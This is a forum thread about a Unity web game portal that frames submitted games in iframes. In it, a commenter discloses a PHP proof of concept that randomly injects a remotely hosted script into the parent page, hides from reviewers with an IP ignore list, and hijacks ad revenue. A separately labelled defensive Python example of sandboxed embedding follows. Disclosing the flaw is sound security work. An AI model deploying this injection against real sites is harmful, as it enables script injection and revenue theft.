Kuroato Media would like to Present U3DGP.com, short for “Unity 3D Game Portal”
We would like to offer you (Developers and Publishers) this opportunity to Submit your Game while we are in the Work in Progress Stage of Building this Dedicated Unity 3D Web Game Portal.
The Goal is to provide the Best Browser-based Unity 3D Games this Community has to Offer. Also, give you an opportunity to Earn 100% Revenue from your Google Adsense.
We do Not, and will Not Ask you to include any kind of Plugin / Splash Screen / Logo of any sort into your Unity 3D Game! You can Submit your Game as is…
Please note there are 3 simple Requirements for Getting your Game Hosted on U3DGP.com, just go on over and visit the website now and click on “Submit Game” to see the Requirements and Email Address to Send your Game!
With your Support we can make this Website the Number #1 Unity 3D Web Game Portal on the Internet.
well all games submitted will be monitored, so that is easily fixed by removing the game that has an iframe breakout or redirection, SIMPLE! = )
This iFrame method is not about saving Bandwidth but about allowing developers full control of their game and revenue stream. Most Game Portals place many restrictions and rules on how you are able to post your game to their Website, and also steal lots of the revenue through their so-called Revenue Sharing Programs.
So no worries… this will and does work, as I have proof of it… = )
First of all, I know this is not the place for security talk, but I think this needs to be addressed before people put their trust into your service.
Here is some example code for you; this is just one of many ways to do this sort of attack.
And “fixed by removing the game” is not security. It’s like saying “We will encrypt our passwords when someone finds the database”. The damage has already been done.
The page you send in looks like this:
<?php
if (!empty($_GET["site"]))
{
    // preg_match the site's html for the unity webfile.
    // Load in that file here:
    include_once("GetExternalUnityWebPlayer.php");
}
else
{
    // Load in our own game, since the visitor is visiting our own game!
    include_once("OurOwnUnityGame.php");
}

// This array should be filled from a database with the first ~100 visitors' IP addresses,
// since the first 100 will include the page's devs (while verifying the page).
$ignoreIPArray = array();

// If random is 1 (~1% chance) AND the IP is not in our blacklist, inject our script.
// (The two conditions must be joined with &&.)
if (rand(0, 100) == 1 && !in_array($_SERVER['REMOTE_ADDR'], $ignoreIPArray))
{
    // Build the URL of the directory this script is served from.
    $url = "http://" . $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"] . dirname($_SERVER["SCRIPT_NAME"]);
    echo <<<EOF
<script>
parent.$("body").append("<script src='{$url}/injection.js'><\/script>");
</script>
EOF;
}
?>
Also host this script on your server under the name “injection.js”:
Change the MyPage variable to your (the attackers) page.
This is super simple code that injects the main page with a javascript that will change the Iframe to always route via my page. Allowing me to take all advertisement for games played after mine.
This is just one of many ways to do this sort of thing; even with sandbox mode (new in HTML and Chrome) you are not safe from cross site attacks.
There is a good talk about iframe security from Defcon a few years back that talks about how malware developers abused and hid their code inside normal iframe advertisements.
Hope you understand the security flaw in your design now.
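A defensive counterpart to the design criticised in the post above, as an added example that is not code from this thread or from U3DGP: the portal never takes a `site` URL from the request, serves hand-approved games from a separate origin inside a sandboxed iframe, and refuses any sandbox value that would hand the frame the two capabilities the posted injection relies on (same-origin access to `parent` and top navigation). Hostnames and game ids are constructed placeholders; this is a hardening of the embed, not a guarantee against every cross-site technique.

```python
from html import escape
from urllib.parse import urlsplit

# Constructed allow-list of approved games (hypothetical hostnames). Games live on a
# separate origin from the portal, and the portal never takes a URL from the request.
APPROVED_GAMES = {
    "spacewar": "https://games.example.net/spacewar/index.html",
    "puzzle": "https://games.example.net/puzzle/",
}

# Sandbox tokens that would hand the frame what the posted injection relies on:
# same-origin access to parent.document, or the right to navigate the top window.
DANGEROUS_SANDBOX_TOKENS = {
    "allow-same-origin",
    "allow-top-navigation",
    "allow-top-navigation-by-user-activation",
    "allow-popups-to-escape-sandbox",
}
DEFAULT_SANDBOX = "allow-scripts"

def resolve_game(game_id, approved=APPROVED_GAMES):
    """Map an opaque id to an approved https URL; None if not approved or malformed."""
    url = approved.get(game_id)
    if url is None:
        return None
    parts = urlsplit(url)
    if parts.scheme != "https" or not parts.netloc or "@" in parts.netloc:
        return None
    return url

def sandbox_is_safe(sandbox):
    """True when the sandbox attribute grants none of the dangerous capabilities."""
    return not (set(sandbox.split()) & DANGEROUS_SANDBOX_TOKENS)

def build_embed(game_id, approved=APPROVED_GAMES, sandbox=DEFAULT_SANDBOX):
    """Return the iframe tag for an approved game, or raise ValueError."""
    url = resolve_game(game_id, approved)
    if url is None:
        raise ValueError("game id is not on the allow-list")
    if not sandbox_is_safe(sandbox):
        raise ValueError("sandbox would grant same-origin or top-navigation")
    return '<iframe src="%s" sandbox="%s"></iframe>' % (escape(url, quote=True), escape(sandbox, quote=True))

def portal_headers(game_origin):
    """Headers for the portal page: it frames only the game origin and nobody frames it."""
    return {
        "Content-Security-Policy": "frame-src %s; frame-ancestors 'none'" % game_origin,
        "X-Frame-Options": "DENY",
    }
```

Because the framed game runs in an opaque origin, a script inside it that tries `parent.$("body")` gets a cross-origin SecurityError instead of the portal's DOM.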
Hang on, so… if I get 100% of the Adsense revenue on my game, then where do you make your money? I don’t want to submit anything to a portal that’s going to go bust in a few weeks.